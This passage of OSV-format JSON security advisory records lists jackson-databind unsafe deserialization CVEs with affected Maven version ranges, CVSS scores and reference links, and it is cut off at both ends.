"url": "https://lists.apache.org/thread.html/4b832d1327703d6b287a6d223307f8f884d798821209a10647e93324@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-07-17T14:51:50Z", "nvd_published_at": "2019-06-19T14:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cvm9-fjm9-3572", "published": "2021-12-09T19:16:10Z", "modified": "2024-02-18T05:25:36.165759Z", "aliases": [ "CVE-2020-36181" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-cvm9-fjm9-3572/GHSA-cvm9-fjm9-3572.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-cvm9-fjm9-3572/GHSA-cvm9-fjm9-3572.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36181" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:23Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f3j5-rmmp-3fc5", "published": "2020-06-15T18:44:48Z", "modified": "2024-03-15T05:20:35.120151Z", "aliases": [ "CVE-2019-17267" ], "summary": "Improper Input Validation in jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10 and 2.8.11.5. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-f3j5-rmmp-3fc5/GHSA-f3j5-rmmp-3fc5.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-f3j5-rmmp-3fc5/GHSA-f3j5-rmmp-3fc5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17267" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2460" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191017-0006" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00013.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d727fc681fb3828794acbefcaee31393742b4d73a29461ccd9597a8@%3Cdev.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T21:47:17Z", "nvd_published_at": "2019-10-07T00:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f9hv-mg5h-xcw9", "published": "2019-01-04T19:06:57Z", "modified": "2024-03-12T05:18:23.439473Z", "aliases": [ "CVE-2018-19360" ], "summary": "Deserialization of Untrusted Data in jackson-databind due to polymorphic deserialization", "details": "FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.8" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-f9hv-mg5h-xcw9/GHSA-f9hv-mg5h-xcw9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-f9hv-mg5h-xcw9/GHSA-f9hv-mg5h-xcw9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-f9hv-mg5h-xcw9/GHSA-f9hv-mg5h-xcw9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19360" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-f9hv-mg5h-xcw9" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/TINKERPOP-2121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107985" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:16Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f9xh-2qgp-cq57", "published": "2021-12-09T19:16:42Z", "modified": "2024-02-18T05:32:05.421673Z", "aliases": [ "CVE-2020-36188" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-f9xh-2qgp-cq57/GHSA-f9xh-2qgp-cq57.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-f9xh-2qgp-cq57/GHSA-f9xh-2qgp-cq57.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36188" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2996" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:25:02Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fmmc-742q-jg75", "published": "2019-11-13T00:32:27Z", "modified": "2024-03-16T05:19:55.172981Z", "aliases": [ "CVE-2019-16943" ], "summary": "jackson-databind polymorphic typing issue", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 prior to 2.9.10.1, 2.8.11.5, and 2.6.7.3. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-fmmc-742q-jg75/GHSA-fmmc-742q-jg75.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-fmmc-742q-jg75/GHSA-fmmc-742q-jg75.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-fmmc-742q-jg75/GHSA-fmmc-742q-jg75.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16943" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2478" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/328a0f833daf6baa443ac3b37c818a0204714b0b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bc67eb11a7cf57561f861ff16f879f1fceb5779f" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": 